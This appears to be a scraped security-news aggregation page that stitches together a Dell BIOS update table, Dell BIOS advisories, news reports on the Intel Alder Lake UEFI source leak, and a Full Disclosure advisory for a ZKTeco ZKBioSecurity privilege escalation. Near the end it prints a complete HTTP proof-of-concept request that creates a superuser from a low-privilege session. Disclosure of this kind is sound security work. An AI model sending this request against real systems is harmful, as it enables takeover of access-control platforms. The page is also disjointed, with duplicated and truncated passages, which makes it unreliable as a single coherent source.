08/08/2022

Inspiron 5480

2.16.0

08/23/2022

Inspiron 5481 2-in-1

2.16.0

08/23/2022

Inspiron 5482

2.16.0

08/23/2022

Inspiron 5490

1.20.0

08/08/2022

Inspiron 5490 All-In-One

1.16.0

08/09/2022

Inspiron 5491 2-in-1

1.16.0

08/04/2022

Inspiron 5493

1.23.0

08/08/2022

Inspiron 5494

1.20.0

08/08/2022

Inspiron 5498

1.20.0

08/08/2022

Inspiron 5570

1.10.0

08/10/2022

Inspiron 5580

2.16.0

08/23/2022

Inspiron 5583

1.20.0

08/04/2022

Inspiron 5584

1.20.0

08/04/2022

Inspiron 5590

1.20.0

08/08/2022

Inspiron 5591 2-in-1

1.16.0

08/04/2022

Inspiron 5593

1.23.0

08/08/2022

Inspiron 5594

1.20.0

08/08/2022

Inspiron 5598

1.20.0

08/08/2022

Inspiron 5680

2.12.0

08/10/2022

Inspiron 5770

1.10.0

08/10/2022

Inspiron 7000

1.19.0

08/09/2022

Inspiron 7370

1.25.0

08/11/2022

Inspiron 7373 2-in-1

1.25.0

08/11/2022

Inspiron 7380

1.18.0

08/08/2022

Inspiron 7386

1.16.0

08/09/2022

Inspiron 7390

1.19.0

08/04/2022

Inspiron 7391

1.17.0

08/04/2022

Inspiron 7490

1.15.0

08/08/2022

Inspiron 7570

1.25.0

08/11/2022

Inspiron 7573 2-in-1

1.25.0

08/11/2022

Inspiron 7580

1.18.0

08/08/2022

Inspiron 7586

1.16.0

08/09/2022

Inspiron 7590

1.19.0

08/04/2022

Inspiron 7590

1.15.0

08/09/2022

Inspiron 7591

1.17.0

08/04/2022

Inspiron 7591

1.15.0

08/09/2022

Inspiron 7700 AIO

1.13.0

08/02/2022

Inspiron 7777

1.2.20

08/08/2022

Inspiron 7786

1.16.0

08/09/2022

Inspiron 7790

1.16.0

08/09/2022

Inspiron 7791

1.17.0

08/04/2022

Inspiron 5491 All-In-One

1.16.0

08/09/2022

Latitude 13 3380

1.19.0

08/16/2022

Latitude 3120

1.10.0

08/10/2022

Latitude 3180

1.19.0

08/15/2022

Latitude 3189

1.19.0

08/15/2022

Latitude 3190

1.22.0

08/15/2022

Latitude 3190 2-in-1

1.22.0

08/15/2022

Latitude 3300

1.17.0

08/18/2022

Latitude 3301

1.23.0

08/05/2022

Latitude 3310

1.16.0

08/10/2022

Latitude 3310 2-in-1

1.15.0

08/18/2022

Latitude 3379

1.0.36

08/16/2022

Latitude 3390

1.21.0

08/18/2022

Latitude 3400

1.25.0

08/04/2022

Latitude 3490

1.20.0

08/11/2022

Latitude 3500

1.25.0

08/04/2022

Latitude 3590

1.20.0

08/11/2022

Latitude 5280

1.26.0

08/12/2022

Latitude 5285 2-in-1

1.19.0

08/12/2022

Latitude 5289

1.29.0

08/15/2022

Latitude 5290

1.24.0

08/12/2022

Latitude 5290 2-in-1

1.22.0

08/25/2022

Latitude 5300

1.23.0

08/21/2022

Latitude 5300 2-in-1

1.23.0

08/21/2022

Latitude 5310

1.15.0

08/09/2022

Latitude 5310 2-in-1

1.15.0

08/09/2022

Latitude 5400

1.19.0

08/12/2022

Latitude 5401

1.21.0

08/12/2022

Latitude 5410

1.15.0

08/11/2022

Latitude 5411

1.15.0

08/11/2022

Latitude 5414 Rugged

1.36.0

08/16/2022

Latitude 5420 Rugged

1.18.0

08/16/2022

Latitude 5424 Rugged

1.18.0

08/16/2022

Latitude 5480

1.26.0

08/12/2022

Latitude 5488

1.26.0

08/12/2022

Latitude 5490

1.24.0

08/12/2022

Latitude 5491

1.23.0

08/12/2022

Latitude 5495

1.9.0

08/16/2022

Latitude 5500

1.19.0

08/12/2022

Latitude 5501

1.21.0

08/12/2022

Latitude 5510

1.15.0

08/11/2022

Latitude 5511

1.15.0

08/11/2022

Latitude 5580

1.26.0

08/12/2022

Latitude 5590

1.24.0

08/12/2022

Latitude 5591

1.23.0

08/12/2022

Latitude 7200 2-in-1

1.19.0

08/09/2022

Latitude 7210 2-in-1

1.16.0

08/22/2022

Latitude 7212 Rugged Extreme Tablet

1.40.0

08/16/2022

Latitude 7214 Rugged Extreme

1.36.0

08/16/2022

Latitude 7220 Rugged Extreme Tablet

1.23.0

08/16/2022

Latitude 7220EX Rugged Extreme Tablet

1.23.0

08/16/2022

Latitude 7275 2-in-1

1.16.0

08/15/2022

Latitude 7280

1.27.0

08/15/2022

Latitude 7285 2-in-1

1.17.0

08/12/2022

Latitude 7290

1.27.0

08/16/2022

Latitude 7300

1.21.0

08/10/2022

Latitude 7310

1.17.0

08/10/2022

Latitude 7370

1.30.3

08/16/2022

Latitude 7380

1.27.0

08/15/2022

Latitude 7389

1.29.0

08/15/2022

Latitude 7390

1.27.0

08/16/2022

Latitude 7390 2-in-1

1.26.0

08/12/2022

Latitude 7400

1.21.0

08/10/2022

Latitude 7400 2-in-1

1.18.0

08/09/2022

Latitude 7410

1.17.0

08/10/2022

Latitude 7414 Rugged Extreme

1.36.0

08/16/2022

Latitude 7424 Rugged Extreme

1.18.0

08/16/2022

Latitude 7480

1.27.0

08/15/2022

Latitude 7490

1.27.0

08/16/2022

Latitude 9410

1.16.0

08/10/2022

Latitude 9510

1.14.0

08/09/2022

Latitude E5270

1.32.3

08/12/2022

Latitude E5470

1.32.3

08/12/2022

Latitude E5570

1.32.3

08/12/2022

Latitude E7270

1.35.3

08/15/2022

Latitude E7470

1.35.3

08/15/2022

OptiPlex 3050

1.21.0

08/09/2022

OptiPlex 3040

1.20.1

08/09/2022

OptiPlex 3046

1.17.0

08/09/2022

OptiPlex 3050 All-In-One

1.22.0

08/08/2022

OptiPlex 3060

1.21.0

08/09/2022

OptiPlex 3070

1.16.0

08/09/2022

OptiPlex 3080

2.14.0

08/10/2022

OptiPlex 3090

2.7.0

08/10/2022

OptiPlex 3280 All-In-One

1.15.0

08/08/2022

OptiPlex 5050

1.21.0

08/11/2022

OptiPlex 5055 A-Series

1.7.0

09/07/2022

OptiPlex 5055 Ryzen APU

1.7.0

09/07/2022

OptiPlex 5055 Ryzen CPU

1.7.0

09/07/2022

OptiPlex 5060

1.21.0

08/09/2022

OptiPlex 5070

1.16.0

08/09/2022

OptiPlex 5080

1.14.0

08/10/2022

OptiPlex 5250

1.22.0

08/08/2022

OptiPlex 5260 All-In-One

1.21.0

08/08/2022

OptiPlex 5480 All-In-One

1.16.0

08/08/2022

OptiPlex 7040

1.24.0

08/09/2022

OptiPlex 7050

1.21.0

08/09/2022

OptiPlex 7060

1.21.0

08/09/2022

OptiPlex 7070

1.16.0

08/09/2022

OptiPlex 7070 Ultra

1.14.0

08/09/2022

OptiPlex 7071

1.15.0

08/09/2022

OptiPlex 7080

1.14.0

08/09/2022

OptiPlex 7450

1.22.0

08/08/2022

OptiPlex 7460 All-In-One

1.21.0

08/08/2022

OptiPlex 7470 All-In-One

1.16.0

08/08/2022

OptiPlex 7480 All-In-One

1.16.0

08/08/2022

OptiPlex 7760 All-In-One

1.21.0

08/08/2022

OptiPlex 7770 All-In-One

1.16.0

08/08/2022

OptiPlex 7780 All-In-One

1.16.0

08/08/2022

OptiPlex XE3

1.21.0

08/09/2022

Precision 3240 Compact

1.13.0

08/11/2022

Precision 3420 Tower

2.22.0

08/08/2022

Precision 3430 Tower

1.20.0

08/09/2022

Precision 3431 Tower

1.15.0

08/09/2022

Precision 3440

1.14.0

08/09/2022

Precision 3510

1.32.3

08/12/2022

Precision 3520

1.26.0

08/12/2022

Precision 3530

1.23.0

08/12/2022

Precision 3540

1.19.0

08/12/2022

Precision 3541

1.21.0

08/12/2022

Precision 3550

1.15.0

08/11/2022

Precision 3551

1.15.0

08/11/2022

Precision 3620 Tower

2.22.0

08/08/2022

Precision 3630 Tower

2.15.0

08/08/2022

Precision 3640 Tower

1.16.0

08/16/2022

Precision 3930 Rack

2.20.0

08/10/2022

Precision 5510

1.23.0

08/11/2022

Precision 5530

1.26.0

08/09/2022

Precision 5530 2-in-1

1.20.8

08/09/2022

Precision 5540

1.18.0

08/09/2022

Precision 5720 All-In-One

2.15.0

08/09/2022

Precision 5820 Tower

2.21.0

08/10/2022

Precision 7510

1.28.3

08/12/2022

Precision 7520

1.26.0

08/12/2022

Precision 7530

1.24.0

08/12/2022

Precision 7540

1.21.0

08/10/2022

Precision 7550

1.17.0

08/09/2022

Precision 7710

1.28.3

08/12/2022

Precision 7720

1.26.0

08/12/2022

Precision 7730

1.24.0

08/12/2022

Precision 7740

1.21.0

08/10/2022

Precision 7750

1.17.0

08/09/2022

Precision 7820 Tower

2.26.1

09/07/2022

Precision 7920 Tower

2.26.1

09/07/2022

Vostro 3070

2.24.0

08/09/2022

Vostro 3267

1.22.0

08/10/2022

Vostro 3268

1.22.0

08/10/2022

Vostro 3401

1.17.0

08/08/2022

Vostro 3470

2.24.0

08/09/2022

Vostro 3471

1.11.0

08/08/2022

Vostro 3480

1.20.0

08/08/2022

Vostro 3481

1.18.0

08/08/2022

Vostro 3490

1.20.0

08/08/2022

Vostro 3501

1.17.0

08/08/2022

Vostro 3580

1.20.0

08/08/2022

Vostro 3581

1.18.0

08/08/2022

Vostro 3582

1.15.0

08/08/2022

Vostro 3583

1.20.0

08/08/2022

Vostro 3584

1.18.0

08/08/2022

Vostro 3590

1.20.0

08/08/2022

Vostro 3667

1.22.0

08/10/2022

Vostro 3668

1.22.0

08/10/2022

Vostro 3669

1.22.0

08/10/2022

Vostro 3670

2.24.0

08/09/2022

Vostro 3671

1.11.0

08/08/2022

Vostro 3681

2.14.0

08/10/2022

Vostro 3881

2.14.0

08/10/2022

Vostro 3888

2.14.0

08/10/2022

Vostro 5090

1.15.0

08/09/2022

Vostro 5390

1.18.0

08/05/2022

Vostro 5391

1.19.0

08/09/2022

Vostro 5481

2.16.0

08/23/2022

Vostro 5490

1.20.0

08/08/2022

Vostro 5491

1.23.0

08/08/2022

Vostro 5581

2.16.0

08/23/2022

Vostro 5590

1.20.0

08/08/2022

Vostro 5591

1.23.0

08/08/2022

Vostro 5880

1.14.0

08/09/2022

Vostro 7590

1.15.0

08/09/2022

Wyse 5070

1.18.0

08/10/2022

Wyse 5470

1.15.0

08/16/2022

Wyse 5470 All-In-One

1.16.1

08/26/2022

Wyse 7040 Thin Client

1.17.0

08/08/2022

XPS 13 7390

1.17.0

08/09/2022

XPS 13 7390 2-in-1

1.18.0

08/09/2022

XPS 13 9300

1.14.0

08/09/2022

XPS 13 9365 2-in-1

2.23.0

08/25/2022

XPS 13 9370

1.21.0

08/24/2022

XPS 13 9380

1.20.0

08/09/2022

XPS 15 7590

1.26.0

08/09/2022

XPS 15 9575 2-in-1

1.22.0

08/09/2022

XPS 7590

1.18.0

08/09/2022

XPS 8930

1.1.24

08/03/2022

XPS 8940

2.9.0

08/08/2022

XPS 8950

1.5.0

08/08/2022

Alienware 15 R2, Alienware 17, Alienware Area-51m, Alienware 17 R4, Alienware 17 R2, Alienware 17 R3, Alienware Area 51, Alienware Aurora, Alienware Aurora R11, Alienware Aurora R12, Alienware Aurora R13, Alienware m17 R2, Alienware m17 R3Näytä lisää

29 syysk. 2022

CVE-2022-32483: DSA-2022-248: Dell Client BIOS Security Update

Exposed code included private key for Intel Boot Guard, meaning it can no longer be trusted, according to a researcher.

Intel has confirmed the leak of the Unified Extensible Firmware Interface (UEFI) BIOS of Alder Lake, the company's code name for its latest processor — the 12th generation Intel Core processor — which debuted in late 2021. 

According to reports, the Intel UEFI code was first leaked late last week on 4chan, and later GitHub, and it contained 5.97GB of data. It was dated 9-30-22, likely when it was exfiltrated, analysts reported. "In addition, one thing should be noted that the key pairs required by Boot Guard during provisioning stage is also included in the leaked content," researchers from Hardened Vault who analyzed the leaked data explained. 

Researcher Mark Ermolov noted the same thing on Twitter on Oct. 8, adding, "... the Intel Boot Guard on the vendor's platforms can no longer be trusted." 

The researchers at Hardened Vault pointed out the code could be particularly useful for malicious actors who want to reverse engineer the code to find vulnerabilities. 

In a statement provided to Security Week, Intel acknowledged the breach, attributing it to a third-party and downplaying its potential security risk. "Intel does not believe this exposes, or creates, any new security vulnerabilities as we do not rely on obfuscation of information as a security measure," Intel said in a statement. "We are reaching out to customers, partners and the security research community to keep them informed of this situation." 

The Hardened Vault team said it hasn't been able to trace the data back to the leaker but suggested that the developer of the firmware solution, Insyde, might have more information to share. "But it is still impossible to confirm the person who leaked it," the team wrote. "The leak is part of Insyde solution which integrate Intel’s resources. Perhaps Insyde knows more than we do."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Intel Processor UEFI Source Code Leaked

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE‑2022-32486

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32492

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

  
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE‑2022-32486

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2022-32492

Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.

  
7.5

  
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

See NVD (https://nvd.nist.gov/) for individual scores for each CVE.

  See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell Technologies recommends all customers update at the earliest opportunity.

Go to the Drivers & Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

**Product**

**Affected Version**

**Updated Version**

**BIOS Release Date (MM-DD-YYYY)**

Precision 5820 Tower

Versions before 2.21.0

2.21.0

09-14-2022

Precision 7820 Tower

Versions before 2.25.0

2.25.0

09-14-2022

Precision 7920 Tower

Versions before 2.25.0

2.25.0

09-14-2022

See NVD (https://nvd.nist.gov/) for individual scores for each CVE.

  See the table below for Dell Client BIOS releases containing resolutions to these vulnerabilities. Dell Technologies recommends all customers update at the earliest opportunity.

Go to the Drivers & Downloads site for updates on the applicable products. To learn more, see Dell KB article Dell BIOS Updates, and download the update for your Dell computer.

Customers may use one of the Dell notification solutions to be notified and download driver, BIOS, and firmware updates automatically once available.

**Product**

**Affected Version**

**Updated Version**

**BIOS Release Date (MM-DD-YYYY)**

Precision 5820 Tower

Versions before 2.21.0

2.21.0

09-14-2022

Precision 7820 Tower

Versions before 2.25.0

2.25.0

09-14-2022

Precision 7920 Tower

Versions before 2.25.0

2.25.0

09-14-2022

**Kiitokset**

Dell Technologies would like to thank yngweijw for reporting CVE‑2022-32486 and CVE-2022-32492.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022-09-22

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Precision 5820 Tower, Precision 7820 Tower, Precision 7920 Tower, Product Security Information

22 syysk. 2022

CVE-2022-32492: DSA-2022-169: Dell Client Precision 5820, 7820, and 7920 Tower BIOS Security Update

Chipmaker Intel has confirmed that proprietary source code related to its Alder Lake CPUs has been leaked, following its release by an unknown third-party on 4chan and GitHub last week.
The published content contains Unified Extensible Firmware Interface (UEFI) code for Alder Lake, the company's 12th generation processors that was originally launched in November 2021.
In a statement shared with

Chipmaker Intel has confirmed that proprietary source code related to its Alder Lake CPUs has been leaked, following its release by an unknown third-party on 4chan and GitHub last week.

The published content contains Unified Extensible Firmware Interface (UEFI) code for Alder Lake, the company's 12th generation processors that was originally launched in November 2021.

In a statement shared with Tom's Hardware, Intel said the leak doesn't expose "any new security vulnerabilities as we do not rely on obfuscation of information as a security measure."

It's also encouraging the broader security research community to report any potential issues through its bug bounty program, adding it's reaching out to customers to notify them of the matter.

Besides the UEFI code, the leaked data dump includes a plethora of files and tools, some of which appear to come from firmware vendor Insyde Software.

Exact details surrounding the nature of the hack, including its provenance, are unclear. The GitHub repository has since been taken down, although it remains accessible via other replicated versions.

That said, indications are that the repository had been created by an employee of LC Future Center, a Chinese manufacturer of computers and laptops.

Earlier this February, the LAPSUS$ extortionist group breached NVIDIA, siphoning 1TB of sensitive data. The threat actor later claimed that the company had launched a retaliatory ransomware strike to prevent the release of the stolen data.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Intel Confirms Leak of Alder Lake BIOS Source Code

ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.

CVE-2022-36635

An access control issue in ZKTeco ZKBioSecurity V5000 3.0.5_r allows attackers to arbitrarily create admin users via a crafted HTTP request.

**Full Disclosure mailing list archives**

_From_: Caio B <caioburgardt () gmail com>  
_Date_: Thu, 29 Sep 2022 11:20:39 -0300  

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0\_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's
permissions correctly. An attacker with "Person Self-Login" or "User"
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101
Firefox/102.0

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base\_index.action

Cookie: <INSERT\_LOW-PRIVILEGE\_COOKIE\_HERE>

Upgrade-Insecure-Requests: 1





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"





test\_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"





add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"





1657813612925\_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"





base

-----------------------------291763244192371568695079347--





#######################END#######################
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)** _Caio B (Sep 30)_

Tag

#bios